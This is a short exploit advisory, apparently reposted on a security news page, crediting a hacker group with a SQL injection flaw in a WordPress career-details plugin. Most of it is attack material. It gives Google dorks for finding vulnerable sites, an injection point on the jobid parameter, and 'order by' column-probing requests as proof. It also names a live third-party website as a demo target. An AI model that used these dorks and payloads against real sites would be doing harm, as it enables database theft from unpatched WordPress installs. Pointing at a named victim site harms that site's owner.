facebook facebook twitter rss

Wordpress career details Sql Injection Vulnerability

Author: Iran Cyber Security Group , Published: 30-06-2015
#######################################################
#
# [+] Exploit Title: Wordpress career details Sql Injection Vulnerability
# [+] Exploit Author: Iran Cyber Security Group
# [+] Discovered By: The_C0der & JOK3R
# [+] Platforms: php
# [+] Tested on: Windows & Linux
#
#######################################################
#
# [+] Google Dork: inurl:/career-details/?jobid=
# [+] Google Dork: inurl:/plugins/job-manager/
#
#######################################################
#
# [+] VULNERABILITY:
#
# Wordpress career Details Sql Injection Vulnerability
#
#######################################################
#
# [+] Exploit:
#
#http://localhost/[path]/career-details/?jobid=[ID]'[Sql Injection]
#
#######################################################
#
# [+] Proof:
#
#http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
#http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
#
#######################################################
#
# [+] Demo:
#
#http://pragmasys.in/career-details-2/?jobid=7
#
#http://pragmasys.in/career-details-2/?jobid=7%27
#
#
#######################################################
#
# [+] Home : http://Iran-Cyber.Org
#
#######################################################

Like us on Facebook :